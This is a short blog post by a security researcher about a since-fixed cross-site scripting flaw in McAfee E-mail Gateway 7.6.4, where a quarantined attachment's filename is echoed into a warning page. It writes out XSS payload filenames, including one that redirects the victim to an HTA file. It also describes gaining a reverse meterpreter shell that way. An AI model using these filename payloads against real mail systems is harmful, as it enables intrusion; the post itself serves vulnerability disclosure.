How a spamfilter can help you to drop a shell

A while ago i discovered a cross-site scripting vulnerability (XSS) in the McAfee E-mail Gateway (MEG) 7.6.4. I reported this vulnerability to McAfee, they fixed it within a few months. The security advisory can be found over here. MEG is an application that can be used to filter out malicious attachments from e-mails, however due to the vulnerability an attacker is able to abuse this functionality to drop a malicious file.

The McAfee E-mail Gateway is replacing a malicious file with a warning HTML-file (1_warning.html). I saw that this HTML-file is displaying the filename of the replaced malicious file (e.g. malicious.xlsx). This made me curious, I decided to check whether it was possible to use this filename to perform a cross-site scripting attack because it was used within HTML-context.

In order to check whether the XSS was present, i created a malicious Excel document. The file needs to be malicious in order to be replaced by the McAfee E-mail Gateway. The file was named “file<IMG SRC=x onerror=”alert(‘XSS’)”>jem.xls“. I e-mailed this file to a e-mailbox that was protected by McAfee E-mail Gateway. When opening the warning HTML-file, the following behavior became clear:

webgatewayxss

Together with @rikvduijn i decided to abuse this issue further in order to pop a shell on a target , with some user interaction. The XSS attack can be used to redirect a victim to a malicious website. We decided to use HTA-files, these files can be generated using the awesome Unicorn script. By performing a document.location on the victims computer, pointed to the HTA-file, our victim should get a popup with the question to open the HTA-file.

After trying, we achieved the redirect with the following filename (replace 99,99,99… with charcodes for URL):
file<IMG SRC=x onerror=document.location(String.fromCharCode(99,99,99,99,99,99,99,99,99,99,99,99,99,99))>jem.xls
The filename was changed and the document was send again to the victim, and the popup appeared!

htapopup

When the victim opens the file, his computer runs a reverse https meterpreter backdoor. Thank you e-mail filter :-).

 

Leave a Reply

Your email address will not be published. Required fields are marked *